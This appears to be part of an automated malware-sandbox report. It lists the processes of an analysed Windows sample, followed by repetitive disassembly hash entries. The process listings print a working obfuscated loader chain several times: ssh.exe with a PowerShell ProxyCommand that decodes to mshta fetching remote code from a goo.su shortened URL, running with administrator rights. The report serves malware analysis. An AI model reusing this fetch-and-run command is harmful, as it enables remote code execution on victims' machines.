                                                                                                                                                                                                2024-12-17 07:43:27 UTC132INData Raw: 47 49 46 38 37 61 1f 00 1f 00 80 00 00 6b 8a ce fc fe fe 2c 00 00 00 00 1f 00 1f 00 00 02 63 84 8f a9 cb ed 0f 63 0a b4 da 8b ad ca bc 87 ed 85 15 28 86 e4 27 19 da 34 a6 c0 8a c0 92 ac 96 68 dc e2 e2 42 bf 3b 9f 3b fc 84 c2 60 ad c3 2a 52 4e 18 d6 ad 87 d4 3d 8d be a6 74 ba 74 d2 ac d5 9b d2 98 f9 32 b5 30 28 98 23 26 7f b9 66 8d e9 e8 85 db c2 e4 f9 85 69 6f e7 ef ae be ff 0f 98 50 00 00 3b
                                                                                                                                                                                                Data Ascii: GIF87ak,cc('4hB;;`*RN=tt20(#&fioP;


                                                                                                                                                                                                Statistics

                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Behavior

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                Start time:02:43:12
                                                                                                                                                                                                Start date:17/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')" .
                                                                                                                                                                                                Imagebase:0x7ff6f6940000
                                                                                                                                                                                                File size:946'176 bytes
                                                                                                                                                                                                MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:02:43:12
                                                                                                                                                                                                Start date:17/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:02:43:12
                                                                                                                                                                                                Start date:17/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')
                                                                                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:02:43:14
                                                                                                                                                                                                Start date:17/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://goo.su/J3JHqIi"
                                                                                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:02:43:15
                                                                                                                                                                                                Start date:17/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\mshta.exe" https://goo.su/J3JHqIi
                                                                                                                                                                                                Imagebase:0x7ff6bf990000
                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:02:43:21
                                                                                                                                                                                                Start date:17/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 00007FFAAC2C33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.1313030720.00007FFAAC2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ffaac2c0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                  • Instruction ID: 575bbc60fac2a8e3a7eef0eef1bdfcece3659a804d3e4fa73c486c74300a641b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0501677111CB0C8FD744EF0CE451AA6B7E0FB95364F50056DE58AC3665DA36E882CB45

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 0000014F3AA40FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539466616.0000014F3AA40000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F3AA40000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f3aa40000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                  • Instruction ID: 73dca7d23893f99635c3647d82ed15d24786f178b4f9fb0bd6c6149404574c83
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A900215C9550695D81455921C4529C50407788350FD444A4581790354D44D029BB253
                                                                                                                                                                                                  Function 0000014F3AA40FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539466616.0000014F3AA40000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F3AA40000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f3aa40000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                  • Instruction ID: 73dca7d23893f99635c3647d82ed15d24786f178b4f9fb0bd6c6149404574c83
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A900215C9550695D81455921C4529C50407788350FD444A4581790354D44D029BB253
                                                                                                                                                                                                  Function 0000014F3B8E0F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000003.1378659265.0000014F3B8E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F3B8E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_3_14f3b8e0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction ID: f575e22528e03c0fb1227028a171ea3907f195ef38c6ca7267b8be93ee5c903b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F9004144D540F55D41415D10C577DC504073CC350FD44CD44417D43D5D45D03F75153
                                                                                                                                                                                                  Function 0000014F3B8E0F99 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000003.1378659265.0000014F3B8E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F3B8E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_3_14f3b8e0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction ID: f575e22528e03c0fb1227028a171ea3907f195ef38c6ca7267b8be93ee5c903b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F9004144D540F55D41415D10C577DC504073CC350FD44CD44417D43D5D45D03F75153
                                                                                                                                                                                                  Function 0000014F3B8E0F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000003.1378659265.0000014F3B8E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F3B8E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_3_14f3b8e0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction ID: f575e22528e03c0fb1227028a171ea3907f195ef38c6ca7267b8be93ee5c903b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F9004144D540F55D41415D10C577DC504073CC350FD44CD44417D43D5D45D03F75153
                                                                                                                                                                                                  Function 0000014F3B8E0FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000003.1378659265.0000014F3B8E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F3B8E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_3_14f3b8e0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction ID: f575e22528e03c0fb1227028a171ea3907f195ef38c6ca7267b8be93ee5c903b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F9004144D540F55D41415D10C577DC504073CC350FD44CD44417D43D5D45D03F75153
                                                                                                                                                                                                  Function 0000014F3B8E0FA1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000003.1378659265.0000014F3B8E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F3B8E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_3_14f3b8e0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction ID: f575e22528e03c0fb1227028a171ea3907f195ef38c6ca7267b8be93ee5c903b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F9004144D540F55D41415D10C577DC504073CC350FD44CD44417D43D5D45D03F75153
                                                                                                                                                                                                  Function 0000014F3B8E0FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000003.1378659265.0000014F3B8E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F3B8E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_3_14f3b8e0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction ID: f575e22528e03c0fb1227028a171ea3907f195ef38c6ca7267b8be93ee5c903b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F9004144D540F55D41415D10C577DC504073CC350FD44CD44417D43D5D45D03F75153
                                                                                                                                                                                                  Function 0000014F390A0F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539428863.0000014F390A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F390A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f390a0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction ID: 7647e6ed43a7d526e0ae9470c03096369b6d098704b2169453c06986fa74029a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A59004554D540F55D41417F10D457DC505073CD354FD444D44417F0754D44D03D751D3
                                                                                                                                                                                                  Function 0000014F390A0F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539428863.0000014F390A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F390A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f390a0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction ID: 7647e6ed43a7d526e0ae9470c03096369b6d098704b2169453c06986fa74029a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A59004554D540F55D41417F10D457DC505073CD354FD444D44417F0754D44D03D751D3
                                                                                                                                                                                                  Function 0000014F390A0F81 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539428863.0000014F390A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F390A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f390a0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction ID: 7647e6ed43a7d526e0ae9470c03096369b6d098704b2169453c06986fa74029a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A59004554D540F55D41417F10D457DC505073CD354FD444D44417F0754D44D03D751D3
                                                                                                                                                                                                  Function 0000014F390A0F99 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539428863.0000014F390A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F390A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f390a0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction ID: 7647e6ed43a7d526e0ae9470c03096369b6d098704b2169453c06986fa74029a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A59004554D540F55D41417F10D457DC505073CD354FD444D44417F0754D44D03D751D3
                                                                                                                                                                                                  Function 0000014F390A0F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539428863.0000014F390A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F390A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f390a0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction ID: 7647e6ed43a7d526e0ae9470c03096369b6d098704b2169453c06986fa74029a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A59004554D540F55D41417F10D457DC505073CD354FD444D44417F0754D44D03D751D3
                                                                                                                                                                                                  Function 0000014F390A0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539428863.0000014F390A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F390A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f390a0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction ID: 7647e6ed43a7d526e0ae9470c03096369b6d098704b2169453c06986fa74029a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A59004554D540F55D41417F10D457DC505073CD354FD444D44417F0754D44D03D751D3
                                                                                                                                                                                                  Function 0000014F390A0FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539428863.0000014F390A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F390A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f390a0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction ID: 7647e6ed43a7d526e0ae9470c03096369b6d098704b2169453c06986fa74029a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A59004554D540F55D41417F10D457DC505073CD354FD444D44417F0754D44D03D751D3
                                                                                                                                                                                                  Function 0000014F390A0F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539428863.0000014F390A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F390A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f390a0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction ID: 7647e6ed43a7d526e0ae9470c03096369b6d098704b2169453c06986fa74029a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A59004554D540F55D41417F10D457DC505073CD354FD444D44417F0754D44D03D751D3
                                                                                                                                                                                                  Function 0000014F390A0F69 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539428863.0000014F390A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F390A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f390a0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction ID: 7647e6ed43a7d526e0ae9470c03096369b6d098704b2169453c06986fa74029a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A59004554D540F55D41417F10D457DC505073CD354FD444D44417F0754D44D03D751D3
                                                                                                                                                                                                  Function 0000014F390A0F61 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2539428863.0000014F390A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014F390A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_14f390a0000_mshta.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction ID: 7647e6ed43a7d526e0ae9470c03096369b6d098704b2169453c06986fa74029a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A59004554D540F55D41417F10D457DC505073CD354FD444D44417F0754D44D03D751D3